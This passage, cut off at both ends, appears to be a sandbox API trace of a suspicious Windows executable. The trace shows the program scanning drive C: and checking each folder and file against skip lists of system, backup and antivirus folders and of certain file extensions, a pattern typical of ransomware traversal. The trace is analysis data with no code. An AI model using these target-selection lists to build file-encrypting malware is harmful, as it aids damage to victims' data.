lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe")) returned 0x35 [0090.720] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ALL*.fldp", lpFindFileData=0x19f9b8 | out: lpFindFileData=0x19f9b8) returned 0xffffffff [0090.720] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0090.720] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0090.720] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[LDRIVESSCAN]", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.720] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[LDRIVESSCAN]", cchWideChar=13, lpMultiByteStr=0x1fb2eec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[LDRIVESSCAN]", lpUsedDefaultChar=0x0) returned 13 [0090.720] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0xd, lpNumberOfBytesWritten=0x19fc0c, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x19fc0c*=0xd, lpOverlapped=0x0) returned 1 [0090.724] FindFirstFileW (in: lpFileName="C:\\*.*", lpFindFileData=0x19f940 | out: lpFindFileData=0x19f940) returned 0x2b7088 [0090.725] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", cchLength=0x1e | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\DESKTOP\\") returned 0x1e [0090.725] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0090.725] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0090.725] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0090.725] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0090.725] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0090.725] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0090.725] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0090.725] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0090.725] CharUpperBuffW (in: lpsz="C:\\$Recycle.Bin\\", cchLength=0x10 | out: lpsz="C:\\$RECYCLE.BIN\\") returned 0x10 [0090.725] CharUpperBuffW (in: lpsz=".Bin", cchLength=0x4 | out: lpsz=".BIN") returned 0x4 [0090.725] CharUpperBuffW (in: lpsz="$Recycle.Bin", cchLength=0xc | out: lpsz="$RECYCLE.BIN") returned 0xc [0090.725] FindNextFileW (in: hFindFile=0x2b7088, lpFindFileData=0x19f940 | out: lpFindFileData=0x19f940) returned 1 [0090.725] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", cchLength=0x1e | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\DESKTOP\\") returned 0x1e [0090.725] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0090.725] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0090.726] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0090.726] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0090.726] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0090.726] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0090.726] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0090.726] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0090.726] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0090.726] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0090.726] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0090.726] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0090.726] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0090.726] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0090.726] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0090.726] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0090.726] CharUpperBuffW (in: lpsz="C:\\Boot\\", cchLength=0x8 | out: lpsz="C:\\BOOT\\") returned 0x8 [0090.726] CharUpperBuffW (in: lpsz="Boot", cchLength=0x4 | out: lpsz="BOOT") returned 0x4 [0090.726] FindNextFileW (in: hFindFile=0x2b7088, lpFindFileData=0x19f940 | out: lpFindFileData=0x19f940) returned 1 [0090.726] CharUpperBuffW (in: lpsz="bootmgr", cchLength=0x7 | out: lpsz="BOOTMGR") returned 0x7 [0090.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="", cchCount2=0) returned 3 [0090.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="BOOTMGR", cchCount2=7) returned 3 [0090.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="BOOTMGR", cchCount2=7) returned 3 [0090.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="BOOTMGR", cchCount2=7) returned 3 [0090.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="BOOTMGR", cchCount2=7) returned 3 [0090.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="BOOTMGR", cchCount2=7) returned 3 [0090.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="BOOTMGR", cchCount2=7) returned 3 [0090.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="BOOTMGR", cchCount2=7) returned 3 [0090.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="BOOTMGR", cchCount2=7) returned 3 [0090.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="BOOTMGR", cchCount2=7) returned 2 [0090.729] FindNextFileW (in: hFindFile=0x2b7088, lpFindFileData=0x19f940 | out: lpFindFileData=0x19f940) returned 1 [0090.729] CharUpperBuffW (in: lpsz="BOOTNXT", cchLength=0x7 | out: lpsz="BOOTNXT") returned 0x7 [0090.729] FindNextFileW (in: hFindFile=0x2b7088, lpFindFileData=0x19f940 | out: lpFindFileData=0x19f940) returned 1 [0090.729] CharUpperBuffW (in: lpsz=".BAK", cchLength=0x4 | out: lpsz=".BAK") returned 0x4 [0090.729] CharUpperBuffW (in: lpsz="BOOTSECT.BAK", cchLength=0xc | out: lpsz="BOOTSECT.BAK") returned 0xc [0090.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EMAN", cchCount1=4, lpString2="BAK", cchCount2=3) returned 3 [0090.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0090.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0090.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0090.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0090.729] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="BAK", cchCount2=3) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="BAK", cchCount2=3) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="BAK", cchCount2=3) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="BAK", cchCount2=3) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="BAK", cchCount2=3) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="BAK", cchCount2=3) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="BOOTSECT.BAK", cchCount2=12) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="BOOTSECT.BAK", cchCount2=12) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="BOOTSECT.BAK", cchCount2=12) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="BOOTSECT.BAK", cchCount2=12) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="BOOTSECT.BAK", cchCount2=12) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="BOOTSECT.BAK", cchCount2=12) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="BOOTSECT.BAK", cchCount2=12) returned 3 [0090.730] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="BOOTSECT.BAK", cchCount2=12) returned 2 [0090.730] FindNextFileW (in: hFindFile=0x2b7088, lpFindFileData=0x19f940 | out: lpFindFileData=0x19f940) returned 1 [0090.731] CharUpperBuffW (in: lpsz="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", cchLength=0x1e | out: lpsz="C:\\USERS\\CIIHMNXMN6PS\\DESKTOP\\") returned 0x1e [0090.731] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.731] CharUpperBuffW (in: lpsz="\\WINDOWS\\", cchLength=0x9 | out: lpsz="\\WINDOWS\\") returned 0x9 [0090.731] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.731] CharUpperBuffW (in: lpsz="\\WINDOWS.OLD\\", cchLength=0xd | out: lpsz="\\WINDOWS.OLD\\") returned 0xd [0090.731] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.731] CharUpperBuffW (in: lpsz="\\WINDOWS10UPGRADE\\", cchLength=0x12 | out: lpsz="\\WINDOWS10UPGRADE\\") returned 0x12 [0090.731] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.731] CharUpperBuffW (in: lpsz="\\$RECYCLE.BIN\\", cchLength=0xe | out: lpsz="\\$RECYCLE.BIN\\") returned 0xe [0090.731] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.731] CharUpperBuffW (in: lpsz="\\WINDOWS NT\\", cchLength=0xc | out: lpsz="\\WINDOWS NT\\") returned 0xc [0090.731] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.731] CharUpperBuffW (in: lpsz="\\COMMON FILES\\", cchLength=0xe | out: lpsz="\\COMMON FILES\\") returned 0xe [0090.731] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.731] CharUpperBuffW (in: lpsz="\\TEMP\\", cchLength=0x6 | out: lpsz="\\TEMP\\") returned 0x6 [0090.731] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.731] CharUpperBuffW (in: lpsz="\\BOOT\\", cchLength=0x6 | out: lpsz="\\BOOT\\") returned 0x6 [0090.731] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.731] CharUpperBuffW (in: lpsz="\\MSOCACHE\\", cchLength=0xa | out: lpsz="\\MSOCACHE\\") returned 0xa [0090.731] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.731] CharUpperBuffW (in: lpsz="\\DEFAULT USER\\", cchLength=0xe | out: lpsz="\\DEFAULT USER\\") returned 0xe [0090.731] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.732] CharUpperBuffW (in: lpsz="\\ACRONIS\\", cchLength=0x9 | out: lpsz="\\ACRONIS\\") returned 0x9 [0090.732] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.732] CharUpperBuffW (in: lpsz="\\BACKUPCLIENT\\", cchLength=0xe | out: lpsz="\\BACKUPCLIENT\\") returned 0xe [0090.732] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.732] CharUpperBuffW (in: lpsz="\\BACKUP MANAGER\\", cchLength=0x10 | out: lpsz="\\BACKUP MANAGER\\") returned 0x10 [0090.732] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.732] CharUpperBuffW (in: lpsz="\\CARBONITE\\", cchLength=0xb | out: lpsz="\\CARBONITE\\") returned 0xb [0090.732] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.732] CharUpperBuffW (in: lpsz="\\INTERNET EXPLORER\\", cchLength=0x13 | out: lpsz="\\INTERNET EXPLORER\\") returned 0x13 [0090.732] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.732] CharUpperBuffW (in: lpsz="\\WINDOWSPOWERSHELL\\", cchLength=0x13 | out: lpsz="\\WINDOWSPOWERSHELL\\") returned 0x13 [0090.732] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.732] CharUpperBuffW (in: lpsz="\\WINDOWS DEFENDER\\", cchLength=0x12 | out: lpsz="\\WINDOWS DEFENDER\\") returned 0x12 [0090.732] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.732] CharUpperBuffW (in: lpsz="\\TOR BROWSER\\", cchLength=0xd | out: lpsz="\\TOR BROWSER\\") returned 0xd [0090.732] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.732] CharUpperBuffW (in: lpsz="\\DVD MAKER\\", cchLength=0xb | out: lpsz="\\DVD MAKER\\") returned 0xb [0090.732] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.732] CharUpperBuffW (in: lpsz="\\ASPNET_CLIENT\\", cchLength=0xf | out: lpsz="\\ASPNET_CLIENT\\") returned 0xf [0090.732] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.732] CharUpperBuffW (in: lpsz="\\REFERENCE ASSEMBLIES\\", cchLength=0x16 | out: lpsz="\\REFERENCE ASSEMBLIES\\") returned 0x16 [0090.733] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.733] CharUpperBuffW (in: lpsz="\\MICROSOFT OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT OFFICE\\") returned 0x12 [0090.733] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.733] CharUpperBuffW (in: lpsz="\\WINDOWS SIDEBAR\\", cchLength=0x11 | out: lpsz="\\WINDOWS SIDEBAR\\") returned 0x11 [0090.733] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.733] CharUpperBuffW (in: lpsz="\\WINDOWS MEDIA PLAYER\\", cchLength=0x16 | out: lpsz="\\WINDOWS MEDIA PLAYER\\") returned 0x16 [0090.733] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.733] CharUpperBuffW (in: lpsz="\\MICROSOFT\\OFFICE\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\OFFICE\\") returned 0x12 [0090.733] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.733] CharUpperBuffW (in: lpsz="\\MICROSOFT ONEDRIVE\\", cchLength=0x14 | out: lpsz="\\MICROSOFT ONEDRIVE\\") returned 0x14 [0090.733] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.733] CharUpperBuffW (in: lpsz="\\GOOGLE\\DRIVE\\", cchLength=0xe | out: lpsz="\\GOOGLE\\DRIVE\\") returned 0xe [0090.733] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.733] CharUpperBuffW (in: lpsz="\\DROPBOX\\", cchLength=0x9 | out: lpsz="\\DROPBOX\\") returned 0x9 [0090.733] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.733] CharUpperBuffW (in: lpsz="\\MICROSOFT\\PROVISIONING\\", cchLength=0x18 | out: lpsz="\\MICROSOFT\\PROVISIONING\\") returned 0x18 [0090.733] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.733] CharUpperBuffW (in: lpsz="\\MICROSOFT SILVERLIGHT\\", cchLength=0x17 | out: lpsz="\\MICROSOFT SILVERLIGHT\\") returned 0x17 [0090.733] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.733] CharUpperBuffW (in: lpsz="\\PROGRAMDATA\\MICROSOFT\\", cchLength=0x17 | out: lpsz="\\PROGRAMDATA\\MICROSOFT\\") returned 0x17 [0090.733] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.734] CharUpperBuffW (in: lpsz="\\MICROSOFT\\CRYPTO\\", cchLength=0x12 | out: lpsz="\\MICROSOFT\\CRYPTO\\") returned 0x12 [0090.734] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.734] CharUpperBuffW (in: lpsz="\\WINDOWSAPPS\\", cchLength=0xd | out: lpsz="\\WINDOWSAPPS\\") returned 0xd [0090.734] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.734] CharUpperBuffW (in: lpsz="\\ACROBAT READER", cchLength=0xf | out: lpsz="\\ACROBAT READER") returned 0xf [0090.734] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.734] CharUpperBuffW (in: lpsz="\\NVIDIA", cchLength=0x7 | out: lpsz="\\NVIDIA") returned 0x7 [0090.734] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.734] CharUpperBuffW (in: lpsz="\\7-ZIP\\", cchLength=0x7 | out: lpsz="\\7-ZIP\\") returned 0x7 [0090.734] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.734] CharUpperBuffW (in: lpsz="\\WINRAR\\", cchLength=0x8 | out: lpsz="\\WINRAR\\") returned 0x8 [0090.734] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.734] CharUpperBuffW (in: lpsz="\\ESET", cchLength=0x5 | out: lpsz="\\ESET") returned 0x5 [0090.734] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.734] CharUpperBuffW (in: lpsz="\\AVAST", cchLength=0x6 | out: lpsz="\\AVAST") returned 0x6 [0090.734] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.734] CharUpperBuffW (in: lpsz="\\MALWAREBYTES", cchLength=0xd | out: lpsz="\\MALWAREBYTES") returned 0xd [0090.734] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.734] CharUpperBuffW (in: lpsz="\\SYMANTEC ENDPOINT", cchLength=0x12 | out: lpsz="\\SYMANTEC ENDPOINT") returned 0x12 [0090.734] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.734] CharUpperBuffW (in: lpsz="\\TREND MICRO", cchLength=0xc | out: lpsz="\\TREND MICRO") returned 0xc [0090.735] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.735] CharUpperBuffW (in: lpsz="\\BITDEFENDER", cchLength=0xc | out: lpsz="\\BITDEFENDER") returned 0xc [0090.735] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.735] CharUpperBuffW (in: lpsz="\\PANDA SECURITY", cchLength=0xf | out: lpsz="\\PANDA SECURITY") returned 0xf [0090.735] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.735] CharUpperBuffW (in: lpsz="\\MCAFEE", cchLength=0x7 | out: lpsz="\\MCAFEE") returned 0x7 [0090.735] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.735] CharUpperBuffW (in: lpsz="\\KASPERSKY LAB", cchLength=0xe | out: lpsz="\\KASPERSKY LAB") returned 0xe [0090.735] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: lpsz="C:\\CONFIG.MSI\\") returned 0xe [0090.735] CharUpperBuffW (in: lpsz="\\KASPERSKYLAB", cchLength=0xd | out: lpsz="\\KASPERSKYLAB") returned 0xd [0090.735] CharUpperBuffW (in: lpsz="C:\\Config.Msi\\", cchLength=0xe | out: 